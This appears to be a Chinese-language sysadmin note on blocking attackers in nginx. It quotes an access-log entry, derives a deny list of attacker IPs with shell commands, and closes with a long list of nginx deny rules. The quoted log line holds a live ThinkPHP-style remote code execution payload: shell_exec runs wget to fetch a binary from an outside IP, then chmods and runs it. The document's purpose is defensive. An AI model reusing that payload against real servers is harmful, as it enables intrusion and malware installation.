找到具有明显特征的访问记录,比如:
156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"
也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。
匹配特征找出不重复的 IP,写入文件:
$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips
编辑一个 nginx 配置,加入到 location 访问中:
$ cat blockips > /etc/nginx/conf.d/blockips.conf
location / {
include /etc/nginx/conf.d/blockips.conf
xxxx;
}
编辑 blockips.conf,行首加 "deny ",行尾加 ";"
%s/^/deny /g
%s/$/;/g
重载 nginx,这些 IP 访问就是403:
# 宿主机模式 $ nginx -s reload # Docker模式 $ docker-compose restart nginx
附一份恶意访问IP:
deny 156.194.121.215; deny 156.195.107.210; deny 156.195.39.140; deny 156.195.45.250; deny 156.196.146.114; deny 156.196.17.47; deny 156.196.229.206; deny 156.196.6.26; deny 156.198.62.131; deny 156.200.245.40; deny 156.201.18.181; deny 156.202.190.62; deny 156.202.251.75; deny 156.202.76.2; deny 156.202.84.179; deny 156.203.12.198; deny 156.203.210.142; deny 156.203.244.51; deny 156.203.7.75; deny 156.205.251.198; deny 156.205.81.35; deny 156.206.136.3; deny 156.206.182.152; deny 156.206.187.73; deny 156.206.231.65; deny 156.207.242.8; deny 156.208.42.167; deny 156.209.137.91; deny 156.209.40.94; deny 156.212.251.36; deny 156.214.142.160; deny 156.214.43.68; deny 156.217.6.172; deny 156.217.9.164; deny 156.218.133.186; deny 156.218.246.73; deny 156.219.214.185; deny 156.221.182.18; deny 156.222.20.232; deny 157.230.121.160; deny 167.172.104.251; deny 192.64.86.141; deny 197.33.213.164; deny 197.33.38.103; deny 197.34.0.63; deny 197.35.49.18; deny 197.36.233.108; deny 197.36.33.241; deny 197.36.4.226; deny 197.36.60.220; deny 197.40.152.66; deny 197.41.192.255; deny 197.41.76.25; deny 197.42.153.234; deny 197.43.203.16; deny 197.46.143.130; deny 197.46.88.69; deny 197.52.120.153; deny 197.52.86.59; deny 197.53.154.219; deny 197.57.10.160; deny 197.58.107.10; deny 197.61.10.30; deny 197.61.18.238; deny 197.61.62.151; deny 197.62.106.69; deny 197.63.152.246; deny 41.232.65.205; deny 41.233.204.74; deny 41.235.104.130; deny 41.236.148.6; deny 41.236.3.171; deny 41.238.205.186; deny 41.238.34.214; deny 41.35.143.95; deny 41.36.168.29; deny 41.36.196.47; deny 41.36.20.93; deny 41.36.221.70; deny 41.40.31.77; deny 41.42.219.201; deny 41.42.59.4; deny 41.43.34.248; deny 41.44.120.131; deny 41.45.98.34; deny 41.46.62.42; deny 41.47.75.136; deny 80.10.22.62; deny 95.14.156.128;
deny 156.196.181.71; deny 156.196.191.37; deny 156.196.197.156; deny 156.196.3.62; deny 156.197.229.125; deny 156.201.133.105; deny 156.201.98.17; deny 156.202.112.54; deny 156.202.152.246; deny 156.202.31.234; deny 156.202.39.255; deny 156.203.54.61; deny 156.203.96.174; deny 156.204.165.223; deny 156.205.169.68; deny 156.206.214.19; deny 156.208.49.5; deny 156.208.51.140; deny 156.209.187.210; deny 156.209.35.200; deny 156.212.44.77; deny 156.213.35.145; deny 156.216.156.144; deny 156.218.136.219; deny 156.219.45.190; deny 156.220.186.189; deny 156.221.230.75; deny 156.221.8.69; deny 182.64.156.46; deny 197.33.205.142; deny 197.33.214.152; deny 197.33.99.150; deny 197.34.177.145; deny 197.35.113.116; deny 197.35.85.109; deny 197.36.186.126; deny 197.36.19.18; deny 197.37.180.73; deny 197.38.244.62; deny 197.40.184.150; deny 197.40.238.169; deny 197.41.112.15; deny 197.41.178.87; deny 197.41.86.1; deny 197.43.220.39; deny 197.45.9.234; deny 197.46.71.54; deny 197.47.108.224; deny 197.47.221.54; deny 197.52.165.67; deny 197.54.42.198; deny 197.56.28.28; deny 197.56.59.108; deny 197.57.167.86; deny 197.57.219.86; deny 197.59.221.148; deny 197.61.186.6; deny 197.61.85.58; deny 197.62.227.36; deny 197.63.13.29; deny 197.63.205.232; deny 41.232.17.135; deny 41.232.27.153; deny 41.234.133.17; deny 41.235.102.192; deny 41.235.244.63; deny 41.236.223.4; deny 41.236.56.8; deny 41.237.33.100; deny 41.239.135.65; deny 41.239.77.234; deny 41.42.35.168; deny 41.42.59.130; deny 41.45.30.236; deny 41.46.236.128; deny 41.46.255.174;
deny 141.98.80.117; deny 141.98.80.42; deny 185.153.196.48; deny 185.153.198.163; deny 185.153.199.3; deny 185.156.177.10; deny 193.106.31.202; deny 193.188.22.123; deny 193.188.22.187;
deny 193.188.22.234; deny 193.188.22.76; deny 193.188.23.25;
deny 39.107.142.5; deny 41.216.186.89; deny 45.141.86.144; deny 46.161.27.112;